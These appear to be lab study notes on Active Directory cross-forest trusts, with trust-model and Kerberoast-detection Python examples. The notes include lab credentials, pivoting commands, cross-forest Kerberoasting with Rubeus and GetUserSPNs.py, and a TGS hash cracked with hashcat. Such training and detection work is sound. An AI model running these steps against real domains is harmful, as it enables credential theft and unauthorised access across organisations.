Cross-Forest Attacks: Overview

A trust relationship, by the standard definition, is a connection established between the authentication systems of two domains. Besides intra-forest trusts there are also cross-forest trusts. Microsoft designates the forest as the security boundary of an Active Directory environment.

1. Cross-forest trust relationships

1.1. External trust

A non-transitive trust between two independent domains that live in different forests; it is a point-to-point trust. This type of trust uses SID filtering.

External trusts are non-transitive: users of the trusted domain can access resources in the trusting domain, but by default users of any other domain in the trusted forest cannot access any domain in the trusting forest. The scope of access is determined by the trust configuration and the permissions set within each domain.

1.2. Forest trust

This is a transitive trust between the root domains of two forests: any user in the trusted forest can authenticate to any domain in the trusting forest.

1.3. Establishing a forest trust

A forest trust can be established in one of two ways: as a one-way trust or as a two-way trust (also called a bidirectional or mutual trust). In a two-way trust, users from both trusting domains can access each other's resources; this is a very common configuration.

In a one-way trust, only users of the "trusted domain" can access resources in the "trusting domain", not the other way round. There are exceptions, however.

It is important to note that the direction of the trust is opposite to the direction of access.
[Image: Pasted image 20260309123303.png]

Trust direction is the reverse of access direction. In short, the direction in which domains trust each other determines the direction in which access is granted.
[Image: Pasted image 20260309123421.png]
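The "trust direction is opposite to access direction" rule and the transitivity differences between the trust types above, modelled as an added Python example (not part of the original notes). The inlanefreight.ad/logistics.ad two-way forest trust and the child domain come from the lab; the one-way external trust from megacorp.ad to logistics.ad is an assumption made up for illustration.

```python
from collections import deque
# Trusts are listed from the TRUSTING domain's side: (trusting, trusted, kind).
# Users of `trusted` may authenticate into `trusting`: access flows against the
# trust arrow. "parent_child" = intra-forest, transitive; "forest" = transitive
# into the trusted forest's own domains but never on to a third forest;
# "external" = point-to-point, non-transitive. The inlanefreight/logistics two-way
# forest trust is the lab's; the megacorp -> logistics external trust is assumed.
TRUSTS = [
    ("child.inlanefreight.ad", "inlanefreight.ad", "parent_child"),
    ("inlanefreight.ad", "child.inlanefreight.ad", "parent_child"),
    ("inlanefreight.ad", "logistics.ad", "forest"),
    ("logistics.ad", "inlanefreight.ad", "forest"),  # second leg makes it two-way
    ("megacorp.ad", "logistics.ad", "external"),     # megacorp trusts logistics only
]

HOME, REMOTE_FOREST, EXTERNAL = 0, 1, 2  # how far along a trust path we already are

def domains_with_access(trusting, trusts=TRUSTS):
    """Set of domains whose users can authenticate into `trusting`."""
    reachable = set()
    start = (trusting, HOME)
    visited, queue = {start}, deque([start])
    while queue:
        domain, mode = queue.popleft()
        if mode == EXTERNAL:
            continue  # an external trust ends the chain: nothing behind it is reachable
        for src, dst, kind in trusts:
            if src != domain:
                continue
            if kind == "parent_child":
                nxt = (dst, mode)  # moving inside a forest keeps the current mode
            elif mode == HOME:
                nxt = (dst, REMOTE_FOREST if kind == "forest" else EXTERNAL)
            else:
                continue  # a forest boundary can be crossed only once per path
            if nxt not in visited:
                visited.add(nxt)
                reachable.add(dst)
                queue.append(nxt)
    reachable.discard(trusting)
    return reachable

def can_access(user_domain, resource_domain, trusts=TRUSTS):
    """True if a user of `user_domain` can authenticate into `resource_domain`."""
    return user_domain in domains_with_access(resource_domain, trusts)

if __name__ == "__main__":
    for d in ("inlanefreight.ad", "child.inlanefreight.ad", "logistics.ad", "megacorp.ad"):
        print(f"{d:24} open to users of: {sorted(domains_with_access(d))}")
```

Run it and note that logistics.ad users reach megacorp.ad while inlanefreight.ad users do not: the external trust is non-transitive, exactly the exposure difference between sections 1.1 and 1.2.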

2. Cross-forest attacks

2.1. Common attack techniques

The basic cross-forest attacks include:

  • Cross-forest Kerberoasting
  • Cross-forest ASREPRoasting
  • Administrator password reuse
  • Foreign group membership

2.2. Lab environment

VM                                  IP
SQL01 (SQL01.inlanefreight.ad)      10.129.5.253 (DHCP) / 172.16.118.10 (dual interface)
DC01 (DC01.inlanefreight.ad)        172.16.118.3
WS01 (WS01.child.inlanefreight.ad)  172.16.118.20
DC02 (DC02.logistics.ad)            172.16.118.252
SQL02 (SQL02.logistics.ad)          172.16.118.11
DC03 (DC03.megacorp.ad)             172.16.118.113

[Image: Pasted image 20260309123706.png]

  • DC01 is the domain controller of inlanefreight.ad
  • DC02 is the domain controller of logistics.ad
  • DC03 is the domain controller of megacorp.ad

2.2.1. Internal network proxy

To talk to the targets on the internal network, SSH dynamic port forwarding is set up here through SQL01:

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# ssh -D 1080 Administrator@10.129.5.253
The authenticity of host '10.129.5.253 (10.129.5.253)' can't be established.
ED25519 key fingerprint is SHA256:n7KwAayabvsIspF8gC89sfuDWg/+ga7YPMN2y6svJMY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.5.253' (ED25519) to the list of known hosts.
Administrator@10.129.5.253's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@SQL01 C:\Users\Administrator>

The password of the SQL01 machine is Test@123.

Then configure proxychains:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080

2.3. Cross-forest Kerberoasting

Because a two-way trust exists between inlanefreight.ad and logistics.ad, Kerberoasting across them is entirely feasible. Using a tool such as Rubeus, the Kerberoasting attack against the logistics.ad domain can be launched from inlanefreight.ad.

2.3.1. RDP into the Inlanefreight DC

proxychains xfreerdp /u:Administrator /p:'HTB_@cademy_adm!' /v:172.16.118.3 /dynamic-resolution

2.3.2. Kerberoasting with Rubeus

C:\Users\Administrator\Desktop>.\Rubeus.exe kerberoast /domain:logistics.ad /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : logistics.ad
[*] Searching path 'LDAP://DC02.logistics.ad/DC=logistics,DC=ad' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : pirate
[*] DistinguishedName      : CN=pirate,CN=Users,DC=logistics,DC=ad
[*] ServicePrincipalName   : Pirate/001.logistics.ad:1433
[*] PwdLastSet             : 4/5/2024 2:53:32 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*pirate$logistics.ad$Pirate/001.logistics.ad:1433@logistics.ad...

impacket's GetUserSPNs.py can also be used:

proxychains -q GetUserSPNs.py -target-domain logistics.ad inlanefreight.ad/administrator:'HTB_@cademy_adm!' -dc-ip 172.16.118.3 -request

2.3.3. Cracking the hash

$krb5tgs$23$*pirate$logistics.ad$Pirate/001.logistics.ad:1433@logistics.ad*$b2392f7faa583332ecf2b3abda3bb9cc$393f47848765f0adce46729915ad2f511dcb39e7adc5c36c02cd6f1e9c804e308d244e8597554795ab5894e95043c704e4c2868e531634969e473298f2e6a810a371e3f4361a95ff6621fd0ed37b3886ab2e42aaf78e1a87061a25bc485b30d9938eb56314528b65f1293947cacbe8f8b6cd4cf460f5d83aac4f88a423653ad61f973b2a9a67bf08534f9a66ec710e163b1b02153b54c53ab550363571eeebf87a08639efba70302f67e603a6bb3d2467ab3e5307ba7b6550f64a1fd7e133ad1ef1e70e15f2ecffb60bc8ead30905f44fc42654432167437050072f2385b75d414650424963a093b9938d33421fe6a988372ebb3a1c20bebc1ec9eacfe3bb2b070abc609a53d8dbb82b82aff84e0294695fae176bc6696dd8d539a010cc30bd078f63fe9c065d29a60ce82b385861b033cd4eb73efb3944d884218ccd0355c45c774b6bca8efa8be2cb7fed955a2424b41ccf020e625f49b1bc315a22399d4dc7da5fd44bc1b9f0f00561f77c32c4e492c51d34b1a08fe04568adfca914c01b5b09eb98197701d8074a0eaa163d74816625031f471da85a069f3bcceae62dae56ae88231584464f13829d44b005d15e23e8b4bd7fa6cca28f81d6b187cb88385121a6377ee5cc4918b912dcbaf22af7999eafc8c9e85b5ad13f2a682562a580658ba1ef94152a7b11af5c073aff1a17ed96304c652e2023bebfaf2713cb10e54e2673f1655b884612afe3160fc7f45de11a405de3df305cd0668b39715d73c722d09054e183d5495a1b48f0dac9b708836656e135e4e1da67dab1573d66224dde6bc1c7daa14e6882bf9a601193427b1217718da6c72ed25903ab25f0dd21575ecb04819ceb7a6660bf838102f959f63ae1ede5ff9cdf5c34b056b1e08e459f9ee94df09dac20390011f41fbf6cc7fa782fb5a7734b0477630ffc151e78d7d59a850799f9c9511a7e6e1eaa8323deac2c0aaca3d6bcdc46dda9fca6fd42a15e3b8258cd886aa2732d66cdfa9f9673a92dae13bcfe2ac5962fe88f8683d952185a427888687b78fe01c4681916ad813d266c7729386e7b7cf18a12795977dff710b5f60bc6fb15c3d338899321ae69dacb5c6120f76eb9370c90e462a642ef57efc7cd69afb73b99be06ea18e417a039c90963afb4762c4745a7cea09e417251ac1ad8eefa6025b4fb8e5b703ef9a69850eb0307e41ef1552fea1ab43dc40d083629add39b024f35a6d7da1c7afb2d396c6f6c47959a66e845f537ee380bb0e8b6d33b74081c6ea80ce24860f881850262a7ea65cab2be04fe80cc81f6912969baa8a86de40fb9e6d343e105948f04842aae5055e9d70698ba9de620db269d0be136fbe7353d47116e43faf4f3b5f88b78bb620253f1289ce8967184a0427eed61b5e0d8774fc5f89d5313aafe88b6858e29c4bec87d01a5ec67e38aaedf05cea46eb01ca21584ee4b28c76735a7118759fd2cad438f61245a01b65b844f7641d8d06502490e3bbb13974a8f6df3422f439bed38ed6247cacb79be3809f1baf2927d74077ffbb4084de6ebc02ef7f149190ca5df334993ba2d7a49604e6b04722df061c8ac5682513:killer

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*pirate$logistics.ad$Pirate/001.logisti...682513
Time.Started.....: Mon Mar 09 14:56:10 2026 (0 secs)
Time.Estimated...: Mon Mar 09 14:56:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 56591.3 kH/s (6.22ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 786432/14344388 (5.48%)
Rejected.........: 0/786432 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> soniya9292
Hardware.Mon.#01.: Temp: 37c Util:  1% Core:1890MHz Mem:7001MHz Bus:8
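An added defender-side example, not from the original notes: over constructed Event ID 4769 records such as a logistics.ad DC might log, it flags RC4 (etype 0x17) service-ticket requests for user-account SPNs, which is exactly what the Rubeus run above produced for the pirate account, and marks requests whose realm differs from the local realm as having arrived over a trust. Field names follow the 4769 event schema; every value, including the requester, IP addresses and the SQL02$ and jdoe entries, is made up for this example.

```python
from collections import defaultdict
# Constructed Event ID 4769 (Kerberos service ticket requested) records, in the
# form a logistics.ad DC might log them. Field names follow the 4769 schema; the
# values are made up for this example.
SAMPLE_4769 = [
    "TargetUserName=administrator@INLANEFREIGHT.AD TargetDomainName=INLANEFREIGHT.AD "
    "ServiceName=pirate TicketEncryptionType=0x17 IpAddress=::ffff:172.16.118.3",
    "TargetUserName=svc_backup@LOGISTICS.AD TargetDomainName=LOGISTICS.AD "
    "ServiceName=SQL02$ TicketEncryptionType=0x12 IpAddress=::ffff:172.16.118.11",
    "TargetUserName=jdoe@LOGISTICS.AD TargetDomainName=LOGISTICS.AD "
    "ServiceName=pirate TicketEncryptionType=0x12 IpAddress=::ffff:172.16.118.50",
    "TargetUserName=administrator@INLANEFREIGHT.AD TargetDomainName=INLANEFREIGHT.AD "
    "ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:172.16.118.3",
]

RC4_HMAC = 0x17  # etype 23, the ticket type behind hashcat mode 13100 and "$krb5tgs$23$"

def parse_4769(line):
    """Turn one 'key=value key=value ...' record into a dict."""
    return dict(field.split("=", 1) for field in line.split())

def is_roastable_service(service):
    """SPNs on user accounts are the Kerberoasting targets; skip machine accounts and krbtgt."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def kerberoast_findings(lines, local_realm):
    """Flag RC4 service-ticket requests for user-account SPNs; note cross-forest requesters."""
    findings, spns_per_requester = [], defaultdict(set)
    for line in lines:
        ev = parse_4769(line)
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # AES tickets (0x11/0x12) are not crackable with mode 13100
        if not is_roastable_service(ev["ServiceName"]):
            continue
        spns_per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
        findings.append({
            "requester": ev["TargetUserName"],
            "service": ev["ServiceName"],
            "source_ip": ev["IpAddress"],
            # a requester realm other than this DC's realm means the request came over a trust
            "cross_forest": ev["TargetDomainName"].upper() != local_realm.upper(),
        })
    # many distinct SPNs from one requester in a short window is the bulk-roast pattern
    return findings, {who: len(spns) for who, spns in spns_per_requester.items()}

if __name__ == "__main__":
    hits, counts = kerberoast_findings(SAMPLE_4769, "LOGISTICS.AD")
    for h in hits:
        print(h)
    print("roastable SPNs per requester:", counts)
```

The RC4 filter has false positives where RC4 is still in routine use, so the cross_forest flag and the per-requester SPN count are what raise a hit to an alert. The fix that removes the crackable etype-23 hash altogether is AES-only SPN accounts with long random passwords or gMSAs, which also changes what the pirate account returned above (RC4_HMAC_DEFAULT).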

3. References: